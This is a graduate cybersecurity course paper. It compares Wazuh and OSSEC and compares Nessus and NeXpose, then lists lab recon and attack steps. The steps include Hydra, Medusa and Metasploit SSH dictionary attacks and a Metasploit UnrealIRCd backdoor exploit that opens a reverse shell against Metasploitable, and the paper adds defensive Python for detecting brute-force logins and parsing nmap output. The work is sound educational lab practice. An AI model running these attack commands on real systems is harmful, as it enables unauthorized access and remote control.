

Module 7: Network Visualization & Vulnerability Final Paper

Russell A. Findley

Masters of Science in Cyber Security Operations and Leadership, University of San Diego

CSOL-570-02-SU21 – Network Visualization and Vulnerability Detection

Author: Russell Findley

Professor Nikolas Behar

August 16, 2021



Contents

Trade Studies
  Network Security Visualization
  Vulnerability Scanning
    Nessus
    NeXpose
Virtualized test lab architecture
Security Toolkit
Surveillance and reconnaissance processes
  Scan a network to determine the operating systems installed on hosts
  Perform a dictionary attack against a host's SSH service
  Launch an exploit payload against a vulnerable web service
  Identify the ports listening on a host
  Eavesdrop on communications between two hosts
  Identify the SSID of an active wireless network
Lessons Learned and Final Thoughts
References

Trade Studies

Network Security Visualization

A trade study was completed to evaluate two network security visualization tools. Network security visualization tools are typically software packages that ingest information from the network and from endpoints and present it as a view of an organization's security posture. The two products reviewed were Wazuh and OSSEC. To perform a comprehensive review of both products, the manuals were checked, online reviews were identified, and each product was installed. The following criteria were also compared:

Scalability and reliability
- Support for managers to scale horizontally.
- TCP support for agent-manager communications.
- Anti-flooding features.
- AES encryption used for agent-manager communications.
- Multi-threading to support faster processing.
- Support for AIX, Solaris, Mac OS X and HP-UX.
- RESTful API for status monitoring.
- Ability to upgrade agents from the managers.
- Improved centralized configuration management using agent groups.

Intrusion detection
- Log analysis engine.
- Ability to monitor larger-sized messages.
- Support for native rules for Suricata.
- NIDS management.
- Support for IP reputation databases.
- Integration with Linux and Windows.

Installation and configuration management
- MSI signed package for Windows systems, with auto-registration and configuration support.
- Unified RPM and Deb Linux packages.

Integration with cloud providers
- Integration with major cloud providers (AWS, Azure, GCP).
- Module for native integration with Microsoft Azure.

Incident response
- Software and hardware inventory system.
- Module for integration with open-source endpoint tools.
- Log collection output options.
- Integration with VirusTotal.

Regulatory compliance
- Compliance mapping with standards like PCI or CIS.
- SHA256 hashes used for file integrity monitoring.

Vulnerability detection and configuration assessment
- Dynamic creation of CVE vulnerability databases, gathering data from OVAL repositories.
- Cross-correlation with applications to detect vulnerable software.
- Integrates with external vulnerability sources.

Elastic Stack integration
- Provides the ability to index and query data.
- Kibana plugin used to visualize data.
- Web user interface with pre-configured extensions, adapting them to your use cases.

The criteria were taken from the vendors' documentation (Wazuh, 2021; OSSEC, 2020).

OSSEC is an open-source host-based intrusion detection system (HIDS) with a "powerful correlation and analysis engine that integrates log analysis, file integrity monitoring, centralized policy enforcement, rootkit detection, real-time alerting, and active response" (Cid, 2020). OSSEC has been around since the mid-2000s and has an active community of users. Only the features of the community version of the product were evaluated.

Wazuh is an open-source host and endpoint security platform. It began as a fork of OSSEC and adds detection and compliance capabilities on top of it. Wazuh appears to be fully open source, since the underlying indexing and visualization software it relies on (the Elastic Stack, ELK) is open source as well.

Vulnerability Scanning

Vulnerability scanning is the process of looking for misconfigurations and known, exploitable software flaws in an operating system or application. Commercial vendors and open-source projects both offer scanners that look for these vulnerabilities and provide recommendations for remediation. For the trade study, the following two commercial scanners were evaluated; neither is open source, but each offers a free edition limited to 16 IP addresses.

Nessus

Nessus is a popular product that competes with vulnerability management products from companies such as Rapid7 and Qualys, and with open-source tools like OpenVAS. The tool's features include "high-speed discovery, configuration auditing, asset profiling, sensitive data discovery, patch management integration, and vulnerability analyses of a security posture" (Professors, 2017). Nessus is often considered one of the most straightforward vulnerability scanners on the market to install and operate. For years Nessus was offered as an open-source tool and was widely used by smaller organizations. Tenable, its vendor, has since changed the licensing model and feature set to compete with the larger players in the space. Tenable still provides a free, limited version (Nessus Essentials) for small environments and students, restricted to scanning 16 IP addresses.


NeXpose

NeXpose is a vulnerability scanner created and supported by Rapid7. Rapid7 has two vulnerability management products, NeXpose and InsightVM. NeXpose is the on-premise scanner and has slightly fewer features than competing products. Rapid7 also sells Metasploit, which takes the vulnerabilities found by tools such as NeXpose and attempts to exploit them. NeXpose can quickly scan a network for exposures and provide real-time risk scoring and remediation options, with a comprehensive set of risk analysis tools and reporting capabilities. NeXpose has a community edition, which is free but limited to scanning 16 IP addresses.

Virtualized test lab architecture

Virtual Server | IP Address | Description (Role)
Metasploitable | 192.168.76.31/24 | Metasploitable is a virtual Linux server created by Rapid7 that contains known vulnerabilities. The virtual machine is the target for exploits launched from the penetration testing servers and software.
Kali Linux 2021.2 | 192.168.76.35/24 | Kali Linux is an open-source penetration testing platform. Kali is used to exploit other servers and services within the network.
Ubuntu | 192.168.76.36/24 | The Ubuntu Linux server is a host on the network running the Wazuh agent for network visualization monitoring.
Windows Server Developer Edition | 192.168.76.38/24 | The Windows server is a host on the network running the Wazuh agent for network visualization monitoring.
Wazuh | 192.168.76.42/24 | The Wazuh virtual appliance contains the manager and the network visualization monitoring platform.

Security Toolkit

Tool | Role
Wireshark | Tool designed to capture network traffic for analysis. Wireshark is used to analyze traffic patterns traversing the network.
Metasploit | Framework used to exploit vulnerabilities on a target host and gain remote control of it.
Kismet | Software used to monitor wireless network traffic.
Wazuh | Network security visualization tool that baselines and monitors events in an environment.
Oracle VirtualBox | The hypervisor used to create the virtual machines.

Surveillance and reconnaissance processes


Scan a network to determine the operating systems installed on hosts

- Nmap (University, 2021)
  - sudo nmap -O 192.168.5.102

OS fingerprinting (-O) sends raw probe packets, so nmap must run as root. The 192.168.5.102 address is the one used by the cited source; in the lab above the target would be, for example, Metasploitable at 192.168.76.31.
Perform a dictionary attack against a host's SSH service (Chandel, 2020)

- Hydra
  - hydra -L user.txt -P password.txt 192.168.0.8 ssh
- Medusa
  - medusa -h 192.168.0.8 -U user.txt -P password.txt -M ssh
- Metasploit
  - use auxiliary/scanner/ssh/ssh_login
  - set RHOSTS 192.168.0.8
  - set USER_FILE user.txt
  - set PASS_FILE password.txt
  - run

user.txt and password.txt are plain wordlists, one candidate per line. The Metasploit option names are RHOSTS, USER_FILE and PASS_FILE; every guess generates a "Failed password" line in the target's sshd log, which is exactly what a host agent such as Wazuh watches for.
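The dictionary attack above is noisy on the target: each guess leaves a "Failed password" entry in the Ubuntu host's sshd log, which the Wazuh agent forwards to the manager. The following Python is an added example (not from the paper and not Wazuh's own rule set) of the defender's side of that procedure: a sliding-window count of failures per source address, escalated when an accepted login follows the failures, since that means a guessed credential worked. The log lines are constructed to match OpenSSH's auth.log format, and the 5-failures-in-60-seconds tuning is an assumption.

```python
"""Detect an SSH dictionary attack from sshd log lines (added example).

Defender's view of the hydra/medusa/Metasploit procedure: count failed
password logins per source in a sliding window, and escalate when a success
follows the failures. Threshold and window are assumed tunings; the sample
log lines are constructed, not taken from a real host.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH auth.log format; "invalid user" appears when the username does not exist.
SSHD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+ ssh2$"
)

SAMPLE_AUTH_LOG = """\
Aug 16 10:01:01 ubuntu sshd[1201]: Failed password for invalid user admin from 192.168.76.35 port 51001 ssh2
Aug 16 10:01:02 ubuntu sshd[1202]: Failed password for root from 192.168.76.35 port 51002 ssh2
Aug 16 10:01:03 ubuntu sshd[1203]: Failed password for invalid user test from 192.168.76.35 port 51003 ssh2
Aug 16 10:01:04 ubuntu sshd[1204]: Failed password for msfadmin from 192.168.76.35 port 51004 ssh2
Aug 16 10:01:05 ubuntu sshd[1205]: Failed password for msfadmin from 192.168.76.35 port 51005 ssh2
Aug 16 10:01:06 ubuntu CRON[1250]: pam_unix(cron:session): session opened for user root by (uid=0)
Aug 16 10:01:07 ubuntu sshd[1207]: Failed password for msfadmin from 192.168.76.35 port 51007 ssh2
Aug 16 10:01:09 ubuntu sshd[1209]: Accepted password for msfadmin from 192.168.76.35 port 51009 ssh2
Aug 16 10:30:00 ubuntu sshd[1300]: Failed password for alice from 192.168.76.36 port 40000 ssh2
Aug 16 10:30:04 ubuntu sshd[1301]: Accepted password for alice from 192.168.76.36 port 40001 ssh2
""".splitlines()


def parse_sshd_line(line):
    """Return a dict for password-auth events, or None for lines that are not of interest."""
    m = SSHD_RE.match(line)
    if m is None:
        return None
    # syslog timestamps carry no year; all events are assumed to fall in one year.
    return {
        "ts": datetime.strptime(m.group("ts"), "%b %d %H:%M:%S"),
        "success": m.group("result") == "Accepted",
        "user": m.group("user"),
        "src": m.group("src"),
    }


def detect_ssh_bruteforce(lines, threshold=5, window_seconds=60):
    """Return alerts in the order they fire.

    A source that accumulates `threshold` failures inside `window_seconds`
    raises one "medium" alert; a later accepted login from that source raises
    a "high" alert, because the guessed credential worked.
    """
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)   # src -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in lines:
        ev = parse_sshd_line(line)
        if ev is None:
            continue
        src, ts = ev["src"], ev["ts"]
        if ev["success"]:
            if src in flagged:
                alerts.append({"level": "high", "rule": "ssh_bruteforce_success",
                               "src": src, "user": ev["user"], "at": ts})
            continue
        recent = failures[src]
        recent.append(ts)
        while recent and ts - recent[0] > window:   # drop failures outside the window
            recent.popleft()
        if len(recent) >= threshold and src not in flagged:
            flagged.add(src)
            alerts.append({"level": "medium", "rule": "ssh_bruteforce",
                           "src": src, "count": len(recent), "at": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

Run against the constructed log, the single mistyped password from 192.168.76.36 produces no alert, while the burst from the Kali address trips the medium rule on the fifth failure and the high rule when msfadmin's password is finally accepted. A real deployment would key on the decoded fields Wazuh already extracts rather than re-parsing the raw line.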
Launch an exploit payload against a vulnerable web service

The module used here targets the backdoored UnrealIRCd 3.2.8.1 that Metasploitable exposes on TCP port 6667, so the service being exploited is an IRC daemon rather than a web service. The module lives under exploit/unix/irc/, and the payload is named without a leading "payload/":

- Metasploit
  - use exploit/unix/irc/unreal_ircd_3281_backdoor
  - set RHOSTS 10.1.2.5
  - show options
  - show payloads
  - set payload cmd/unix/reverse_perl
  - set LHOST 10.1.2.4
  - exploit

The 10.1.2.x addresses are placeholders from the procedure; in the lab above the target is Metasploitable (192.168.76.31) and the reverse shell connects back to Kali (192.168.76.35), so LHOST must be the Kali address.

Identify the ports listening on a host


- To scan all TCP ports (1 - 65535) instead of nmap's default top 1,000 (Jevtic, 2021):
  - nmap -p- 192.168.0.1
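The OS-detection scan and the full port scan above are most useful when their results feed the visualization side of the lab rather than being read off the terminal. The following Python is an added example (not from the paper) that parses nmap's XML output (`-oX`) into a per-host inventory of open ports and the most confident OS match, then compares it against an expected-ports baseline so that a newly exposed service stands out. The XML embedded below is constructed to mimic the shape of `sudo nmap -O -p- -oX scan.xml 192.168.76.0/24` and is not real scan output; the hosts and ports are illustrative.

```python
"""Turn nmap -oX output into per-host OS guesses and open ports (added example).

Standard library only. The XML below is constructed by hand to mimic the
shape of `sudo nmap -O -p- -oX scan.xml 192.168.76.0/24`; it is not a real
scan, and the hosts and ports are illustrative.
"""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -O -p- -oX scan.xml 192.168.76.0/24">
  <host>
    <status state="up"/>
    <address addr="192.168.76.31" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="6667"><state state="open"/><service name="irc"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/><service name="http-proxy"/></port>
    </ports>
    <os>
      <osmatch name="Linux 2.6.9 - 2.6.33" accuracy="100"/>
      <osmatch name="Linux 2.6.32" accuracy="95"/>
    </os>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.76.38" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="445"><state state="filtered"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.76.40" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {ip: {"open_ports": [(port, proto, service), ...], "os": (name, accuracy) or None}}.

    Hosts that are not up are skipped, and only ports in state "open" are kept;
    closed and filtered ports are noise for an exposure inventory.
    """
    results = {}
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is not None and status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        open_ports = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            service = port.find("service")
            name = service.get("name", "unknown") if service is not None else "unknown"
            open_ports.append((int(port.get("portid")), port.get("protocol"), name))
        # nmap lists several osmatch candidates; keep the most confident one.
        matches = host.findall("os/osmatch")
        best = max(matches, key=lambda m: int(m.get("accuracy", "0")), default=None)
        os_guess = (best.get("name"), int(best.get("accuracy", "0"))) if best is not None else None
        results[addr.get("addr")] = {"open_ports": sorted(open_ports), "os": os_guess}
    return results


def unexpected_open_ports(results, baseline):
    """Compare a scan against an expected-ports baseline.

    baseline maps ip -> set of port numbers that are supposed to listen; a host
    absent from the baseline is expected to expose nothing. Only hosts with at
    least one unexpected open port are returned.
    """
    findings = {}
    for ip, info in results.items():
        expected = baseline.get(ip, set())
        extra = sorted(p for p, _, _ in info["open_ports"] if p not in expected)
        if extra:
            findings[ip] = extra
    return findings


if __name__ == "__main__":
    scan = parse_nmap_xml(SAMPLE_NMAP_XML)
    for ip, info in scan.items():
        print(ip, info["os"], [f"{p}/{proto} {svc}" for p, proto, svc in info["open_ports"]])
    print("unexpected:", unexpected_open_ports(scan, {"192.168.76.31": {21, 22, 80}}))
```

With a baseline that allows only FTP, SSH and HTTP on the Metasploitable host, the IRC port 6667 (the one the exploit section targets) and the unlisted RDP port on the Windows host are the two findings. Re-running the scan on a schedule and diffing against the baseline is a cheap way to catch drift between trade-study scans.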
Eavesdrop on communications between two hosts
- Wireshark
  - Start Wireshark; the interface selection screen appears (or choose Capture > Options and select the interface). In this lab the interface is eth0.
  - Choose Capture > Start.
  - Launch a web browser, open orvis.com and click through product pages.
  - Launch another web browser, open sephora.com and click through product pages.
  - When finished, choose Capture > Stop.

Wireshark is a free tool that lets computer and network operators inspect network traffic. It is most often used to troubleshoot network issues, because traffic can be viewed in real time. Wireshark is helpful for the following (Porup, 2018):

- Diagnosing dropped packets
- Identifying network latency
- Identifying malicious traffic

Wireshark is best used by individuals with a background in networking. Understanding the TCP/IP stack and its protocols is essential because of the volume and detail of the information the tool presents. Wireshark dissects both TCP and UDP traffic, as well as broadcast, encrypted (TLS), VoIP and ICMP traffic. For encrypted sessions, such as the HTTPS pages visited in the procedure above, the capture shows the TLS handshake and record sizes but not the page contents.

Figure 1: OSI model (Blogspot, 2020)

Identify the SSID of an active wireless network


- Kismet (requires a wireless adapter that supports monitor mode)
  - sudo airmon-ng check kill (stops NetworkManager and wpa_supplicant so they do not take the adapter back)
  - sudo airmon-ng start wlan0 (puts the adapter into monitor mode, typically as wlan0mon)
  - sudo kismet (starts the Kismet server, which the original steps leave implicit; its web UI listens on port 2501)
  - Open a browser at http://localhost:2501
  - Enable Data Sources and select the monitor-mode interface
  - Available SSIDs will show on screen

Lessons Learned and Final Thoughts

I have been waiting for this class for quite some time to learn more about penetration testing and white-hat hacking. I have previous experience with Windows, Linux, and Solaris operating systems, so I figured I would have an advantage in installing software and configuring the tools in Kali. I learned that I was partially correct. When configuring the operating system, I was at ease with the command line, but installing the tools and configuration was much more difficult than I initially expected. Each of the tools I installed required more libraries and .conf file configurations to make them work. I was pleased that I could make everything work in the end, but I took a significant amount of time trying to make everything function. Reading the manuals, researching forums, and learning through trial and error is never an easy process, but in the end, I feel that I learned a lot.

We could have gone a little deeper into a few topics, such as Wireshark. I know Wireshark is the de facto tool used by most organizations, and learning how to interpret traffic captures will be something I delve into more at a later date. Some of the software like Kismet had been revamped from the documentation provided in the lesson. I would have preferred to have spent more time learning about the product, but instead, a significant amount of time was spent installing a USB adapter. My recommendation for future classes is to provide a list of USB adapters that are shown to work.

This class fills me with the hope of learning more about security operations tools and becoming a more decisive leader. The more I understand how a hacker will execute attacks, the better I can build a cybersecurity operation department. I look forward to digging a little deeper into more of the Kali tools and integrating these into my work.



References

Blogspot. (2020). OSI Model Explained Summary: Definitions and Functions. CCNA Questions and Answers. https://ciscoquestionsandanswers.blogspot.com/2014/12/osi-model-explained-summarydefinitions.html

Chandel, R. (2020, July 30). Password cracking: SSH. Hacking Articles. https://www.hackingarticles.in/password-crackingssh/

Jevtic, G. (2021, May 14). How to use nmap to scan for open ports {updated 2021}. Knowledge Base by phoenixNAP. https://phoenixnap.com/kb/nmap-scan-open-ports

OSSEC. (2020). OSSEC Documentation. OSSEC. https://www.ossec.net/docs/

Professors, E. (2017). Comparison Essay Sample: Nessus vs NeXpose. essaysprofessors.com. https://essaysprofessors.com/samples/comparison/nessus-vs-nexpose.html

University, G. (2021). Determine operating system: Nmap. Geek University. https://geek-university.com/nmap/determine-operating-system/

Wazuh. (2021). User manual. Wazuh 4.1 documentation. https://documentation.wazuh.com/current/user-manual/index.html
